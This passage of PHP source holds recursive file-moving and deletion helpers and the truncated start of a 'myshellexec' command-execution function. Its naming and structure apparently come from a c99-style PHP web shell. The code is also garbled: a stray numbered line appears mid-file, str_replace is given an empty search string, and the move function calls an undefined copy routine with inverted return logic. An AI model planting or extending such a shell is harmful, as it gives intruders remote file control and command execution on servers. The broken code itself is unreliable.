function fs_move_dir($d,$t)
{
$h = opendir($d);
if (!is_dir($t)) {mkdir($t);}
while (($o = readdir($h)) !== false)
{
if (($o != ".") and ($o != ".."))
{
$ret = true;
if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,
$t.DIRECTORY_SEPARATOR.$o);}
else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and
fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}}
if (!$ret) {return $ret;}
}
}
closedir($h);
return true;
}
8. }
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
$d = str_replace("",DIRECTORY_SEPARATOR,$d);
$t = str_replace("",DIRECTORY_SEPARATOR,$t);
if (is_dir($d))
{
if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
if (substr($t,-1,1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
return fs_move_dir($d,$t);
}
elseif (is_file($d))
{
if(copy($d,$t)) {return unlink($d);}
else {unlink($t); return false;}
}
else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
$h = opendir($d);
while (($o = readdir($h)) !== false)
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.$o)) {unlink($d.$o);}
else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
}
}
closedir($h);
rmdir($d);
return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
$o = str_replace("",DIRECTORY_SEPARATOR,$o);
if (is_dir($o))
{
if (substr($o,-1,1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
return fs_rmdir($o);
}
elseif (is_file($o)) {return unlink($o);}
else {return false;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
$result = "";
if (!empty($cmd))